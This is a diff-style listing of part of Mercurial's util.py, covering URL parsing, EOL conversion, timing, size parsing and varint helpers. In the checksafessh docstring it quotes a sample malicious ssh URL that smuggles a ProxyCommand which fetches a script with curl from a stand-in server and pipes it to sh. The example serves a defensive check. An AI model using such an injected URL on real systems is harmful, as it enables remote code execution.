2810 2813 (1, 1 << 20, _(b'%.2f MB')),
2811 2814 (100, 1 << 10, _(b'%.0f KB')),
2812 2815 (10, 1 << 10, _(b'%.1f KB')),
2813 2816 (1, 1 << 10, _(b'%.2f KB')),
2814 2817 (1, 1, _(b'%.0f bytes')),
2815 2818 )
2816 2819
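# For example:
#
#   bytecount(4096)             ->  b'4.00 KB'
#   bytecount(1 << 20)          ->  b'1.00 MB'
#   bytecount(150 * (1 << 20))  ->  b'150 MB'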
2817 2820
2818 2821 class transformingwriter(object):
2819 2822 """Writable file wrapper to transform data by function"""
2820 2823
2821 2824 def __init__(self, fp, encode):
2822 2825 self._fp = fp
2823 2826 self._encode = encode
2824 2827
2825 2828 def close(self):
2826 2829 self._fp.close()
2827 2830
2828 2831 def flush(self):
2829 2832 self._fp.flush()
2830 2833
2831 2834 def write(self, data):
2832 2835 return self._fp.write(self._encode(data))
2833 2836
2834 2837
2835 2838 # Matches a single EOL which can either be a CRLF where repeated CR
2836 2839 # are removed or a LF. We do not care about old Macintosh files, so a
2837 2840 # stray CR is an error.
2838 2841 _eolre = remod.compile(br'\r*\n')
2839 2842
2840 2843
2841 2844 def tolf(s):
2842 2845 # type: (bytes) -> bytes
2843 2846 return _eolre.sub(b'\n', s)
2844 2847
2845 2848
2846 2849 def tocrlf(s):
2847 2850 # type: (bytes) -> bytes
2848 2851 return _eolre.sub(b'\r\n', s)
2849 2852
2850 2853
2851 2854 def _crlfwriter(fp):
2852 2855 return transformingwriter(fp, tocrlf)
2853 2856
2854 2857
2855 2858 if pycompat.oslinesep == b'\r\n':
2856 2859 tonativeeol = tocrlf
2857 2860 fromnativeeol = tolf
2858 2861 nativeeolwriter = _crlfwriter
2859 2862 else:
2860 2863 tonativeeol = pycompat.identity
2861 2864 fromnativeeol = pycompat.identity
2862 2865 nativeeolwriter = pycompat.identity
2863 2866
2864 2867 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2865 2868 3,
2866 2869 0,
2867 2870 ):
2868 2871 # There is an issue in CPython that some IO methods do not handle EINTR
2869 2872 # correctly. The following table shows what CPython version (and functions)
2870 2873 # are affected (buggy: has the EINTR bug, okay: otherwise):
2871 2874 #
2872 2875 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2873 2876 # --------------------------------------------------
2874 2877 # fp.__iter__ | buggy | buggy | okay
2875 2878 # fp.read* | buggy | okay [1] | okay
2876 2879 #
2877 2880 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2878 2881 #
2879 2882 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2880 2883 # like "read*" work fine, as we do not support Python < 2.7.4.
2881 2884 #
2882 2885 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2883 2886 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2884 2887 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2885 2888 # fp.__iter__ but not other fp.read* methods.
2886 2889 #
2887 2890 # On modern systems like Linux, the "read" syscall cannot be interrupted
2888 2891 # when reading "fast" files like on-disk files. So the EINTR issue only
2889 2892 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2890 2893 # files approximately as "fast" files and use the fast (unsafe) code path,
2891 2894 # to minimize the performance impact.
2892 2895
2893 2896 def iterfile(fp):
2894 2897 fastpath = True
2895 2898 if type(fp) is file:
2896 2899 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2897 2900 if fastpath:
2898 2901 return fp
2899 2902 else:
2900 2903 # fp.readline deals with EINTR correctly, use it as a workaround.
2901 2904 return iter(fp.readline, b'')
2902 2905
2903 2906
2904 2907 else:
2905 2908 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2906 2909 def iterfile(fp):
2907 2910 return fp
2908 2911
2909 2912
2910 2913 def iterlines(iterator):
2911 2914 # type: (Iterator[bytes]) -> Iterator[bytes]
2912 2915 for chunk in iterator:
2913 2916 for line in chunk.splitlines():
2914 2917 yield line
2915 2918
2916 2919
2917 2920 def expandpath(path):
2918 2921 # type: (bytes) -> bytes
2919 2922 return os.path.expanduser(os.path.expandvars(path))
2920 2923
2921 2924
2922 2925 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2923 2926 """Return the result of interpolating items in the mapping into string s.
2924 2927
2925 2928 prefix is a single character string, or a two character string with
2926 2929 a backslash as the first character if the prefix needs to be escaped in
2927 2930 a regular expression.
2928 2931
2929 2932 fn is an optional function that will be applied to the replacement text
2930 2933 just before replacement.
2931 2934
2932 2935 escape_prefix is an optional flag that allows using doubled prefix for
2933 2936 its escaping.
2934 2937 """
2935 2938 fn = fn or (lambda s: s)
2936 2939 patterns = b'|'.join(mapping.keys())
2937 2940 if escape_prefix:
2938 2941 patterns += b'|' + prefix
2939 2942 if len(prefix) > 1:
2940 2943 prefix_char = prefix[1:]
2941 2944 else:
2942 2945 prefix_char = prefix
2943 2946 mapping[prefix_char] = prefix_char
2944 2947 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2945 2948 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2946 2949
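# Usage sketch (mapping and string are illustrative):
#
#   interpolate(b'%', {b'user': b'alice'}, b'hello %user')
#     ->  b'hello alice'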
2947 2950
2948 2951 def getport(port):
2949 2952 # type: (Union[bytes, int]) -> int
2950 2953 """Return the port for a given network service.
2951 2954
2952 2955 If port is an integer, it's returned as is. If it's a string, it's
2953 2956 looked up using socket.getservbyname(). If there's no matching
2954 2957 service, error.Abort is raised.
2955 2958 """
2956 2959 try:
2957 2960 return int(port)
2958 2961 except ValueError:
2959 2962 pass
2960 2963
2961 2964 try:
2962 2965 return socket.getservbyname(pycompat.sysstr(port))
2963 2966 except socket.error:
2964 2967 raise error.Abort(
2965 2968 _(b"no port number associated with service '%s'") % port
2966 2969 )
2967 2970
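# For example:
#
#   getport(8080)     ->  8080
#   getport(b'8080')  ->  8080
#   getport(b'http')  ->  80  (resolved via socket.getservbyname)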
2968 2971
2969 2972 class url(object):
2970 2973 r"""Reliable URL parser.
2971 2974
2972 2975 This parses URLs and provides attributes for the following
2973 2976 components:
2974 2977
2975 2978 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2976 2979
2977 2980 Missing components are set to None. The only exception is
2978 2981 fragment, which is set to '' if present but empty.
2979 2982
2980 2983 If parsefragment is False, fragment is included in query. If
2981 2984 parsequery is False, query is included in path. If both are
2982 2985 False, both fragment and query are included in path.
2983 2986
2984 2987 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2985 2988
2986 2989 Note that for backward compatibility reasons, bundle URLs do not
2987 2990 take host names. That means 'bundle://../' has a path of '../'.
2988 2991
2989 2992 Examples:
2990 2993
2991 2994 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2992 2995 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2993 2996 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2994 2997 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2995 2998 >>> url(b'file:///home/joe/repo')
2996 2999 <url scheme: 'file', path: '/home/joe/repo'>
2997 3000 >>> url(b'file:///c:/temp/foo/')
2998 3001 <url scheme: 'file', path: 'c:/temp/foo/'>
2999 3002 >>> url(b'bundle:foo')
3000 3003 <url scheme: 'bundle', path: 'foo'>
3001 3004 >>> url(b'bundle://../foo')
3002 3005 <url scheme: 'bundle', path: '../foo'>
3003 3006 >>> url(br'c:\foo\bar')
3004 3007 <url path: 'c:\\foo\\bar'>
3005 3008 >>> url(br'\\blah\blah\blah')
3006 3009 <url path: '\\\\blah\\blah\\blah'>
3007 3010 >>> url(br'\\blah\blah\blah#baz')
3008 3011 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3009 3012 >>> url(br'file:///C:\users\me')
3010 3013 <url scheme: 'file', path: 'C:\\users\\me'>
3011 3014
3012 3015 Authentication credentials:
3013 3016
3014 3017 >>> url(b'ssh://joe:xyz@x/repo')
3015 3018 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3016 3019 >>> url(b'ssh://joe@x/repo')
3017 3020 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3018 3021
3019 3022 Query strings and fragments:
3020 3023
3021 3024 >>> url(b'http://host/a?b#c')
3022 3025 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3023 3026 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3024 3027 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3025 3028
3026 3029 Empty path:
3027 3030
3028 3031 >>> url(b'')
3029 3032 <url path: ''>
3030 3033 >>> url(b'#a')
3031 3034 <url path: '', fragment: 'a'>
3032 3035 >>> url(b'http://host/')
3033 3036 <url scheme: 'http', host: 'host', path: ''>
3034 3037 >>> url(b'http://host/#a')
3035 3038 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3036 3039
3037 3040 Only scheme:
3038 3041
3039 3042 >>> url(b'http:')
3040 3043 <url scheme: 'http'>
3041 3044 """
3042 3045
3043 3046 _safechars = b"!~*'()+"
3044 3047 _safepchars = b"/!~*'()+:\\"
3045 3048 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3046 3049
3047 3050 def __init__(self, path, parsequery=True, parsefragment=True):
3048 3051 # type: (bytes, bool, bool) -> None
3049 3052 # We slowly chomp away at path until we have only the path left
3050 3053 self.scheme = self.user = self.passwd = self.host = None
3051 3054 self.port = self.path = self.query = self.fragment = None
3052 3055 self._localpath = True
3053 3056 self._hostport = b''
3054 3057 self._origpath = path
3055 3058
3056 3059 if parsefragment and b'#' in path:
3057 3060 path, self.fragment = path.split(b'#', 1)
3058 3061
3059 3062 # special case for Windows drive letters and UNC paths
3060 3063 if hasdriveletter(path) or path.startswith(b'\\\\'):
3061 3064 self.path = path
3062 3065 return
3063 3066
3064 3067 # For compatibility reasons, we can't handle bundle paths as
3065 3068 # normal URLS
3066 3069 if path.startswith(b'bundle:'):
3067 3070 self.scheme = b'bundle'
3068 3071 path = path[7:]
3069 3072 if path.startswith(b'//'):
3070 3073 path = path[2:]
3071 3074 self.path = path
3072 3075 return
3073 3076
3074 3077 if self._matchscheme(path):
3075 3078 parts = path.split(b':', 1)
3076 3079 if parts[0]:
3077 3080 self.scheme, path = parts
3078 3081 self._localpath = False
3079 3082
3080 3083 if not path:
3081 3084 path = None
3082 3085 if self._localpath:
3083 3086 self.path = b''
3084 3087 return
3085 3088 else:
3086 3089 if self._localpath:
3087 3090 self.path = path
3088 3091 return
3089 3092
3090 3093 if parsequery and b'?' in path:
3091 3094 path, self.query = path.split(b'?', 1)
3092 3095 if not path:
3093 3096 path = None
3094 3097 if not self.query:
3095 3098 self.query = None
3096 3099
3097 3100 # // is required to specify a host/authority
3098 3101 if path and path.startswith(b'//'):
3099 3102 parts = path[2:].split(b'/', 1)
3100 3103 if len(parts) > 1:
3101 3104 self.host, path = parts
3102 3105 else:
3103 3106 self.host = parts[0]
3104 3107 path = None
3105 3108 if not self.host:
3106 3109 self.host = None
3107 3110 # path of file:///d is /d
3108 3111 # path of file:///d:/ is d:/, not /d:/
3109 3112 if path and not hasdriveletter(path):
3110 3113 path = b'/' + path
3111 3114
3112 3115 if self.host and b'@' in self.host:
3113 3116 self.user, self.host = self.host.rsplit(b'@', 1)
3114 3117 if b':' in self.user:
3115 3118 self.user, self.passwd = self.user.split(b':', 1)
3116 3119 if not self.host:
3117 3120 self.host = None
3118 3121
3119 3122 # Don't split on colons in IPv6 addresses without ports
3120 3123 if (
3121 3124 self.host
3122 3125 and b':' in self.host
3123 3126 and not (
3124 3127 self.host.startswith(b'[') and self.host.endswith(b']')
3125 3128 )
3126 3129 ):
3127 3130 self._hostport = self.host
3128 3131 self.host, self.port = self.host.rsplit(b':', 1)
3129 3132 if not self.host:
3130 3133 self.host = None
3131 3134
3132 3135 if (
3133 3136 self.host
3134 3137 and self.scheme == b'file'
3135 3138 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3136 3139 ):
3137 3140 raise error.Abort(
3138 3141 _(b'file:// URLs can only refer to localhost')
3139 3142 )
3140 3143
3141 3144 self.path = path
3142 3145
3143 3146 # leave the query string escaped
3144 3147 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3145 3148 v = getattr(self, a)
3146 3149 if v is not None:
3147 3150 setattr(self, a, urlreq.unquote(v))
3148 3151
3149 3152 def copy(self):
3150 3153 u = url(b'temporary useless value')
3151 3154 u.path = self.path
3152 3155 u.scheme = self.scheme
3153 3156 u.user = self.user
3154 3157 u.passwd = self.passwd
3155 3158 u.host = self.host
3156 3159 u.path = self.path
3157 3160 u.query = self.query
3158 3161 u.fragment = self.fragment
3159 3162 u._localpath = self._localpath
3160 3163 u._hostport = self._hostport
3161 3164 u._origpath = self._origpath
3162 3165 return u
3163 3166
3164 3167 @encoding.strmethod
3165 3168 def __repr__(self):
3166 3169 attrs = []
3167 3170 for a in (
3168 3171 b'scheme',
3169 3172 b'user',
3170 3173 b'passwd',
3171 3174 b'host',
3172 3175 b'port',
3173 3176 b'path',
3174 3177 b'query',
3175 3178 b'fragment',
3176 3179 ):
3177 3180 v = getattr(self, a)
3178 3181 if v is not None:
3179 3182 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3180 3183 return b'<url %s>' % b', '.join(attrs)
3181 3184
3182 3185 def __bytes__(self):
3183 3186 r"""Join the URL's components back into a URL string.
3184 3187
3185 3188 Examples:
3186 3189
3187 3190 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3188 3191 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3189 3192 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3190 3193 'http://user:pw@host:80/?foo=bar&baz=42'
3191 3194 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3192 3195 'http://user:pw@host:80/?foo=bar%3dbaz'
3193 3196 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3194 3197 'ssh://user:pw@[::1]:2200//home/joe#'
3195 3198 >>> bytes(url(b'http://localhost:80//'))
3196 3199 'http://localhost:80//'
3197 3200 >>> bytes(url(b'http://localhost:80/'))
3198 3201 'http://localhost:80/'
3199 3202 >>> bytes(url(b'http://localhost:80'))
3200 3203 'http://localhost:80/'
3201 3204 >>> bytes(url(b'bundle:foo'))
3202 3205 'bundle:foo'
3203 3206 >>> bytes(url(b'bundle://../foo'))
3204 3207 'bundle:../foo'
3205 3208 >>> bytes(url(b'path'))
3206 3209 'path'
3207 3210 >>> bytes(url(b'file:///tmp/foo/bar'))
3208 3211 'file:///tmp/foo/bar'
3209 3212 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3210 3213 'file:///c:/tmp/foo/bar'
3211 3214 >>> print(url(br'bundle:foo\bar'))
3212 3215 bundle:foo\bar
3213 3216 >>> print(url(br'file:///D:\data\hg'))
3214 3217 file:///D:\data\hg
3215 3218 """
3216 3219 if self._localpath:
3217 3220 s = self.path
3218 3221 if self.scheme == b'bundle':
3219 3222 s = b'bundle:' + s
3220 3223 if self.fragment:
3221 3224 s += b'#' + self.fragment
3222 3225 return s
3223 3226
3224 3227 s = self.scheme + b':'
3225 3228 if self.user or self.passwd or self.host:
3226 3229 s += b'//'
3227 3230 elif self.scheme and (
3228 3231 not self.path
3229 3232 or self.path.startswith(b'/')
3230 3233 or hasdriveletter(self.path)
3231 3234 ):
3232 3235 s += b'//'
3233 3236 if hasdriveletter(self.path):
3234 3237 s += b'/'
3235 3238 if self.user:
3236 3239 s += urlreq.quote(self.user, safe=self._safechars)
3237 3240 if self.passwd:
3238 3241 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3239 3242 if self.user or self.passwd:
3240 3243 s += b'@'
3241 3244 if self.host:
3242 3245 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3243 3246 s += urlreq.quote(self.host)
3244 3247 else:
3245 3248 s += self.host
3246 3249 if self.port:
3247 3250 s += b':' + urlreq.quote(self.port)
3248 3251 if self.host:
3249 3252 s += b'/'
3250 3253 if self.path:
3251 3254 # TODO: similar to the query string, we should not unescape the
3252 3255 # path when we store it, the path might contain '%2f' = '/',
3253 3256 # which we should *not* escape.
3254 3257 s += urlreq.quote(self.path, safe=self._safepchars)
3255 3258 if self.query:
3256 3259 # we store the query in escaped form.
3257 3260 s += b'?' + self.query
3258 3261 if self.fragment is not None:
3259 3262 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3260 3263 return s
3261 3264
3262 3265 __str__ = encoding.strmethod(__bytes__)
3263 3266
3264 3267 def authinfo(self):
3265 3268 user, passwd = self.user, self.passwd
3266 3269 try:
3267 3270 self.user, self.passwd = None, None
3268 3271 s = bytes(self)
3269 3272 finally:
3270 3273 self.user, self.passwd = user, passwd
3271 3274 if not self.user:
3272 3275 return (s, None)
3273 3276 # authinfo[1] is passed to urllib2 password manager, and its
3274 3277 # URIs must not contain credentials. The host is passed in the
3275 3278 # URIs list because Python < 2.4.3 uses only that to search for
3276 3279 # a password.
3277 3280 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3278 3281
3279 3282 def isabs(self):
3280 3283 if self.scheme and self.scheme != b'file':
3281 3284 return True # remote URL
3282 3285 if hasdriveletter(self.path):
3283 3286 return True # absolute for our purposes - can't be joined()
3284 3287 if self.path.startswith(br'\\'):
3285 3288 return True # Windows UNC path
3286 3289 if self.path.startswith(b'/'):
3287 3290 return True # POSIX-style
3288 3291 return False
3289 3292
3290 3293 def localpath(self):
3291 3294 # type: () -> bytes
3292 3295 if self.scheme == b'file' or self.scheme == b'bundle':
3293 3296 path = self.path or b'/'
3294 3297 # For Windows, we need to promote hosts containing drive
3295 3298 # letters to paths with drive letters.
3296 3299 if hasdriveletter(self._hostport):
3297 3300 path = self._hostport + b'/' + self.path
3298 3301 elif (
3299 3302 self.host is not None and self.path and not hasdriveletter(path)
3300 3303 ):
3301 3304 path = b'/' + path
3302 3305 return path
3303 3306 return self._origpath
3304 3307
3305 3308 def islocal(self):
3306 3309 '''whether localpath will return something that posixfile can open'''
3307 3310 return (
3308 3311 not self.scheme
3309 3312 or self.scheme == b'file'
3310 3313 or self.scheme == b'bundle'
3311 3314 )
3312 3315
3313 3316
3314 3317 def hasscheme(path):
3315 3318 # type: (bytes) -> bool
3316 3319 return bool(url(path).scheme) # cast to help pytype
3317 3320
3318 3321
3319 3322 def hasdriveletter(path):
3320 3323 # type: (bytes) -> bool
3321 3324 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
3322 3325
3323 3326
3324 3327 def urllocalpath(path):
3325 3328 # type: (bytes) -> bytes
3326 3329 return url(path, parsequery=False, parsefragment=False).localpath()
3327 3330
3328 3331
3329 3332 def checksafessh(path):
3330 3333 # type: (bytes) -> None
3331 3334 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3332 3335
3333 3336 This is a sanity check for ssh urls. ssh will parse the first item as
3334 3337 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3335 3338 Let's prevent these potentially exploited urls entirely and warn the
3336 3339 user.
3337 3340
3338 3341 Raises an error.Abort when the url is unsafe.
3339 3342 """
3340 3343 path = urlreq.unquote(path)
3341 3344 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3342 3345 raise error.Abort(
3343 3346 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3344 3347 )
3345 3348
3346 3349
3347 3350 def hidepassword(u):
3348 3351 # type: (bytes) -> bytes
3349 3352 '''hide user credential in a url string'''
3350 3353 u = url(u)
3351 3354 if u.passwd:
3352 3355 u.passwd = b'***'
3353 3356 return bytes(u)
3354 3357
3355 3358
3356 3359 def removeauth(u):
3357 3360 # type: (bytes) -> bytes
3358 3361 '''remove all authentication information from a url string'''
3359 3362 u = url(u)
3360 3363 u.user = u.passwd = None
3361 3364 return bytes(u)
3362 3365
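# For example:
#
#   hidepassword(b'http://alice:secret@example.com/repo')
#     ->  b'http://alice:***@example.com/repo'
#   removeauth(b'http://alice:secret@example.com/repo')
#     ->  b'http://example.com/repo'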
3363 3366
3364 3367 timecount = unitcountfn(
3365 3368 (1, 1e3, _(b'%.0f s')),
3366 3369 (100, 1, _(b'%.1f s')),
3367 3370 (10, 1, _(b'%.2f s')),
3368 3371 (1, 1, _(b'%.3f s')),
3369 3372 (100, 0.001, _(b'%.1f ms')),
3370 3373 (10, 0.001, _(b'%.2f ms')),
3371 3374 (1, 0.001, _(b'%.3f ms')),
3372 3375 (100, 0.000001, _(b'%.1f us')),
3373 3376 (10, 0.000001, _(b'%.2f us')),
3374 3377 (1, 0.000001, _(b'%.3f us')),
3375 3378 (100, 0.000000001, _(b'%.1f ns')),
3376 3379 (10, 0.000000001, _(b'%.2f ns')),
3377 3380 (1, 0.000000001, _(b'%.3f ns')),
3378 3381 )
3379 3382
3380 3383
3381 3384 @attr.s
3382 3385 class timedcmstats(object):
3383 3386 """Stats information produced by the timedcm context manager on entering."""
3384 3387
3385 3388 # the starting value of the timer as a float (meaning and resolution are
3386 3389 # platform dependent, see util.timer)
3387 3390 start = attr.ib(default=attr.Factory(lambda: timer()))
3388 3391 # the number of seconds as a floating point value; starts at 0, updated when
3389 3392 # the context is exited.
3390 3393 elapsed = attr.ib(default=0)
3391 3394 # the number of nested timedcm context managers.
3392 3395 level = attr.ib(default=1)
3393 3396
3394 3397 def __bytes__(self):
3395 3398 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3396 3399
3397 3400 __str__ = encoding.strmethod(__bytes__)
3398 3401
3399 3402
3400 3403 @contextlib.contextmanager
3401 3404 def timedcm(whencefmt, *whenceargs):
3402 3405 """A context manager that produces timing information for a given context.
3403 3406
3404 3407 On entering a timedcmstats instance is produced.
3405 3408
3406 3409 This context manager is reentrant.
3407 3410
3408 3411 """
3409 3412 # track nested context managers
3410 3413 timedcm._nested += 1
3411 3414 timing_stats = timedcmstats(level=timedcm._nested)
3412 3415 try:
3413 3416 with tracing.log(whencefmt, *whenceargs):
3414 3417 yield timing_stats
3415 3418 finally:
3416 3419 timing_stats.elapsed = timer() - timing_stats.start
3417 3420 timedcm._nested -= 1
3418 3421
3419 3422
3420 3423 timedcm._nested = 0
3421 3424
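# Usage sketch (the format string and callee are illustrative):
#
#   with timedcm(b'rebuilding %s', b'index') as stats:
#       rebuild()
#   # stats.elapsed now holds the duration in fractional seconds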
3422 3425
3423 3426 def timed(func):
3424 3427 """Report the execution time of a function call to stderr.
3425 3428
3426 3429 During development, use as a decorator when you need to measure
3427 3430 the cost of a function, e.g. as follows:
3428 3431
3429 3432 @util.timed
3430 3433 def foo(a, b, c):
3431 3434 pass
3432 3435 """
3433 3436
3434 3437 def wrapper(*args, **kwargs):
3435 3438 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3436 3439 result = func(*args, **kwargs)
3437 3440 stderr = procutil.stderr
3438 3441 stderr.write(
3439 3442 b'%s%s: %s\n'
3440 3443 % (
3441 3444 b' ' * time_stats.level * 2,
3442 3445 pycompat.bytestr(func.__name__),
3443 3446 time_stats,
3444 3447 )
3445 3448 )
3446 3449 return result
3447 3450
3448 3451 return wrapper
3449 3452
3450 3453
3451 3454 _sizeunits = (
3452 3455 (b'm', 2 ** 20),
3453 3456 (b'k', 2 ** 10),
3454 3457 (b'g', 2 ** 30),
3455 3458 (b'kb', 2 ** 10),
3456 3459 (b'mb', 2 ** 20),
3457 3460 (b'gb', 2 ** 30),
3458 3461 (b'b', 1),
3459 3462 )
3460 3463
3461 3464
3462 3465 def sizetoint(s):
3463 3466 # type: (bytes) -> int
3464 3467 """Convert a space specifier to a byte count.
3465 3468
3466 3469 >>> sizetoint(b'30')
3467 3470 30
3468 3471 >>> sizetoint(b'2.2kb')
3469 3472 2252
3470 3473 >>> sizetoint(b'6M')
3471 3474 6291456
3472 3475 """
3473 3476 t = s.strip().lower()
3474 3477 try:
3475 3478 for k, u in _sizeunits:
3476 3479 if t.endswith(k):
3477 3480 return int(float(t[: -len(k)]) * u)
3478 3481 return int(t)
3479 3482 except ValueError:
3480 3483 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3481 3484
3482 3485
3483 3486 class hooks(object):
3484 3487 """A collection of hook functions that can be used to extend a
3485 3488 function's behavior. Hooks are called in lexicographic order,
3486 3489 based on the names of their sources."""
3487 3490
3488 3491 def __init__(self):
3489 3492 self._hooks = []
3490 3493
3491 3494 def add(self, source, hook):
3492 3495 self._hooks.append((source, hook))
3493 3496
3494 3497 def __call__(self, *args):
3495 3498 self._hooks.sort(key=lambda x: x[0])
3496 3499 results = []
3497 3500 for source, hook in self._hooks:
3498 3501 results.append(hook(*args))
3499 3502 return results
3500 3503
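# Usage sketch: hooks run in lexicographic order of their source names,
# and the call returns the individual results:
#
#   h = hooks()
#   h.add(b'b-second', lambda v: v * 2)
#   h.add(b'a-first', lambda v: v + 1)
#   h(10)  ->  [11, 20]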
3501 3504
3502 3505 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3503 3506 """Yields lines for a nicely formatted stacktrace.
3504 3507 Skips the 'skip' last entries, then returns the last 'depth' entries.
3505 3508 Each file+linenumber is formatted according to fileline.
3506 3509 Each line is formatted according to line.
3507 3510 If line is None, it yields:
3508 3511 length of longest filepath+line number,
3509 3512 filepath+linenumber,
3510 3513 function
3511 3514
3512 3515 Not to be used in production code, but very convenient while developing.
3513 3516 """
3514 3517 entries = [
3515 3518 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3516 3519 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3517 3520 ][-depth:]
3518 3521 if entries:
3519 3522 fnmax = max(len(entry[0]) for entry in entries)
3520 3523 for fnln, func in entries:
3521 3524 if line is None:
3522 3525 yield (fnmax, fnln, func)
3523 3526 else:
3524 3527 yield line % (fnmax, fnln, func)
3525 3528
3526 3529
3527 3530 def debugstacktrace(
3528 3531 msg=b'stacktrace',
3529 3532 skip=0,
3530 3533 f=procutil.stderr,
3531 3534 otherf=procutil.stdout,
3532 3535 depth=0,
3533 3536 prefix=b'',
3534 3537 ):
3535 3538 """Writes a message to f (stderr) with a nicely formatted stacktrace.
3536 3539 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3537 3540 By default it will flush stdout first.
3538 3541 It can be used everywhere and intentionally does not require an ui object.
3539 3542 Not to be used in production code, but very convenient while developing.
3540 3543 """
3541 3544 if otherf:
3542 3545 otherf.flush()
3543 3546 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3544 3547 for line in getstackframes(skip + 1, depth=depth):
3545 3548 f.write(prefix + line)
3546 3549 f.flush()
3547 3550
3548 3551
3549 3552 # convenient shortcut
3550 3553 dst = debugstacktrace
3551 3554
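During development one might drop a call like the following into a suspect code path (the message and depth are arbitrary); getstackframes is called with skip + 1, so the debugstacktrace frame itself is already excluded:

    from mercurial import util

    def suspicious():
        # prints the five innermost stack entries leading here to stderr
        util.dst(b'who calls suspicious?', depth=5)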
3552 3555
3553 3556 def safename(f, tag, ctx, others=None):
3554 3557 """
3555 3558 Generate a name that is safe to rename f to in the given context.
3556 3559
3557 3560 f: filename to rename
3558 3561 tag: a string tag that will be included in the new name
3559 3562 ctx: a context, in which the new name must not exist
3560 3563 others: a set of other filenames that the new name must not be in
3561 3564
3562 3565 Returns a file name of the form oldname~tag[~number] which does not exist
3563 3566 in the provided context and is not in the set of other names.
3564 3567 """
3565 3568 if others is None:
3566 3569 others = set()
3567 3570
3568 3571 fn = b'%s~%s' % (f, tag)
3569 3572 if fn not in ctx and fn not in others:
3570 3573 return fn
3571 3574 for n in itertools.count(1):
3572 3575 fn = b'%s~%s~%s' % (f, tag, n)
3573 3576 if fn not in ctx and fn not in others:
3574 3577 return fn
3575 3578
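A minimal sketch of the probing loop, faking the context with a plain set since only ``in`` membership is required (the names are hypothetical):

    ctx = {b'foo~orig'}              # name already taken in the context
    others = {b'foo~orig~1'}         # name reserved by the caller
    # b'foo~orig' and b'foo~orig~1' are taken, so probing stops at ~2
    assert safename(b'foo', b'orig', ctx, others) == b'foo~orig~2'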
3576 3579
3577 3580 def readexactly(stream, n):
3578 3581 '''read n bytes from stream.read and abort if fewer were available'''
3579 3582 s = stream.read(n)
3580 3583 if len(s) < n:
3581 3584 raise error.Abort(
3582 3585 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3583 3586 % (len(s), n)
3584 3587 )
3585 3588 return s
3586 3589
3587 3590
3588 3591 def uvarintencode(value):
3589 3592 """Encode an unsigned integer value to a varint.
3590 3593
3591 3594 A varint is a variable length integer of 1 or more bytes. Each byte
3592 3595 except the last has the most significant bit set. The lower 7 bits of
3593 3596 each byte store the value's binary representation, least significant group
3594 3597 first.
3595 3598
3596 3599 >>> uvarintencode(0)
3597 3600 '\\x00'
3598 3601 >>> uvarintencode(1)
3599 3602 '\\x01'
3600 3603 >>> uvarintencode(127)
3601 3604 '\\x7f'
3602 3605 >>> uvarintencode(1337)
3603 3606 '\\xb9\\n'
3604 3607 >>> uvarintencode(65536)
3605 3608 '\\x80\\x80\\x04'
3606 3609 >>> uvarintencode(-1)
3607 3610 Traceback (most recent call last):
3608 3611 ...
3609 3612 ProgrammingError: negative value for uvarint: -1
3610 3613 """
3611 3614 if value < 0:
3612 3615 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3613 3616 bits = value & 0x7F
3614 3617 value >>= 7
3615 3618 bytes = []
3616 3619 while value:
3617 3620 bytes.append(pycompat.bytechr(0x80 | bits))
3618 3621 bits = value & 0x7F
3619 3622 value >>= 7
